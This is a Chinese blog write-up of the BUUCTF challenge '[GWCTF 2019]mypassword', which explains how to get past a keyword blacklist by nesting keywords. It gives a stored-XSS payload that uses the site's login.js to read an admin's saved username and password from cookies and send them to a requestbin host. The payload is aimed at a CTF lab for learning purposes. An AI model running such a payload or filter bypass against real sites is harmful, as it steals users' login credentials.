BUUCTF__[GWCTF 2019]mypassword_题解

最新推荐文章于 2023-09-21 19:43:09 发布
最新推荐文章于 2023-09-21 19:43:09 发布
阅读量873 收藏 1
点赞数 1
分类专栏: BUU做题记录 文章标签: xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/116276324
版权

题解

  • 开局像极了注入,但却是个XSS。
  • 第一步信息收集,没有找到直接的提示或者后端源码。但是注册登录上去在feedback.php 有一个输入反馈,并且在页面存在注释。
			if(is_array($feedback)){
				echo "<script>alert('反馈不合法');</script>";
				return false;
			}
			$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
			foreach ($blacklist as $val) {
		        while(true){
		            if(stripos($feedback,$val) !== false){
		                $feedback = str_ireplace($val,"",$feedback);
		            }else{
		                break;
		            }
		        }
		    }
  • 简单的关键字置换为空,注意 str_ireplace函数,该函数单次匹配递归匹配,但它关键字是一个数组,遍历数组,每次一个关键字,那么就能通过简单的双写关键字绕过,但是不能为同一个关键字。比如简单的<scriphostt>alert(1)</scriphostt>,点击List列表中编号就能弹窗。由被过滤的关键字都是XSS常用的来反推可能是个XSS题目。
  • 第二点,利用XSS来干啥?
  • 容易忽略一个地方,在登录页面中的/js/login.js
if (document.cookie && document.cookie != '') {
	var cookies = document.cookie.split('; ');
	var cookie = {};
	for (var i = 0; i < cookies.length; i++) {
		var arr = cookies[i].split('=');
		var key = arr[0];
		cookie[key] = arr[1];
	}
	if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
		document.getElementsByName("username")[0].value = cookie['user'];
		document.getElementsByName("password")[0].value = cookie['psw'];
	}
}
  • 代码会把cookie中的username和password填进当前表单
  • 如果我们写一个页面,页面中有表单,再调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求带出。就能得到管理员cookie。
  • poc,提交反馈
<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>
	var uname = documcookieent.getElemcookieentsByName("username")[0].value;
	var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
	var res = uname + " " + passwd;
	documcookieent.locacookietion="http://http.requestbin.buuoj.cn/*/?a="+res;
</scricookiept>
  • 先访问http://http.requestbin.buuoj.cn/点击 Create a RequestBin获取一个链接,将poc中的http://http.requestbin.buuoj.cn/*/ 中的*改为自己的标识符就行。过一会刷新。
    在这里插入图片描述
风过江南乱
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
App.rar_csharp 配置文件
09-22
Password=myPassword;" /> ``` 开发者可以根据实际环境修改这些值,使应用程序能够连接到正确的数据库实例。 在压缩包内的`DevComponents.DotNetBar2.dll`文件,这是一个DLL动态链接库,可能属于DevExpress工具包...
ODBC.rar_c# odbc
09-14
Password=myPassword;"; OdbcConnection connection = new OdbcConnection(connectionString); ``` 连接成功后,我们可以打开连接: ```csharp connection.Open(); ``` 执行SQL查询或命令通常通过`OdbcCommand`...
BUUCTF——password1
最新发布
hand2some2的博客
09-21 479
老样子,这道密码类型题我们直接看题目:刚看到题目我是这样的:这是啥?咋解密,然后仔细敲了敲最后一行,尝试将这三个信息关联起来:发现如果将张三变为 zs加上它的日期长度刚好符合题目的xx长度,那我们不妨试下:
BUUCTF-Crypto部分题解-1
一个学习网安的鸡翅
05-16 2295
今天刚刚学了点密码学的知识,于是开始浅浅刷一下Crypto的题库吧。 不太温馨的小提示: 做这类题目的时候,最好要准备好工具。俗话说的好,工欲善其事必先利其器。一款好用的工具能极大地提高效率。这里推荐使用CaptfEncoder工具,然后资源的话,你是在c站啊,你搜索一下,有一大堆大佬已经发出来了,这里就不赘述了。 1.MD5: MD5 1 注意:得到的 flag 请包上 flag{} 提交 这题没什么好说的,直接找MD5破解网站就行了。提交 的时候记得注意一下提交格式哦! 知...
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 667
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
buuctf-password
小星星的博客
04-06 2124
打开题目: 看得我一脸懵逼,谁能想到密码是名字第一个字母缩写+生日?? 即 zs19900315
buuctf crypto [password]解题记录
jsbbd12的博客
09-05 293
buuctf 密码学刷题记录
Connection_Parameters.zip
02-12
user=myuser&password=mypassword"; ``` 在"Connection_Parameters"文件中,可能包含了不同的数据库连接配置示例,用于不同的环境(开发、测试、生产),或者是针对不同数据库系统的配置。理解并正确配置这些参数...
ado_access.rar_mysql ado
09-24
Password=myPassword;" ``` 而针对MySQL,我们可以使用MySQL ODBC驱动,连接字符串会变成: ```cpp connectionString = "Driver={MySQL ODBC 5.1 Driver};Server=myServerAddress;Database=myDataBase;User=...
lianjieshujuku.rar_c 用ADO连接
09-24
Password=myPassword;”。 3. **打开和关闭连接**:使用Connection对象的Open()方法建立连接,Close()方法关闭连接。确保在完成数据操作后正确关闭连接,以释放系统资源。 4. **执行SQL命令**:通过Command对象的...
buu刷题(第一周)
qq_62046696的博客
03-01 783
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
BUUCTF:[GWCTF 2019]mypassword
末初的CSDN博客
04-06 2013
注册登录 这里加载了一个js文件 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn/js/login.js if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {};...
BUUCTF-Crypto-password
餐桌上的猫
02-22 1057
题目截图 附件截图 根据姓名和生日构造密码,从key的格式可以知道密码的长度为10位,生日19900315加上张三拼音的缩写zs刚好10位,尝试不同的大小写和排列组合得到flag为flag{zs19900315}
BUUCTF:password
Starbright.的博客
11-05 4956
谁会想到flag是zs加19900315呢?
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6226
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
buuoj刷题笔记
q1415500189的博客
01-22 866
buuoj
BUUCTF之基础破解
金 帛的博客
03-10 3129
BUUCTFWP
BUUCTF 个人做题记录【6-6】
qq_61620566的博客
06-06 358
一个ctf的成长记录
BUUCTF-Crypto-password+变异凯撒题解
weixin_47869330的博客
12-10 4002
解题: password: 题目: 姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} 就靠自己瞎猜; 解题格式为: flag{姓名首拼小写+出生年月日} (气死了气死了 我首先还用了九键对应的数字、将姓名化成zhangsan一个字母一个数字对应想用base解密) 3.flag:flag{zs19900315} 变异凯撒: 题目:afZ_r9VYfScOeO_UL^RWUc 解题思路: 不管怎么样先用密码机器在线解密一波,结果各种可能性都试过了发现行不通。 于是开始分析
在哪里配置ansible_ssh_pass
03-26
web1.example.com ansible_ssh_pass=MyPassword123 ``` 这样,当Ansible连接到web1.example.com时,它将使用密码MyPassword123进行身份验证。 需要注意的是,这样明文存储密码是不安全的,建议使用其他安全方式,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值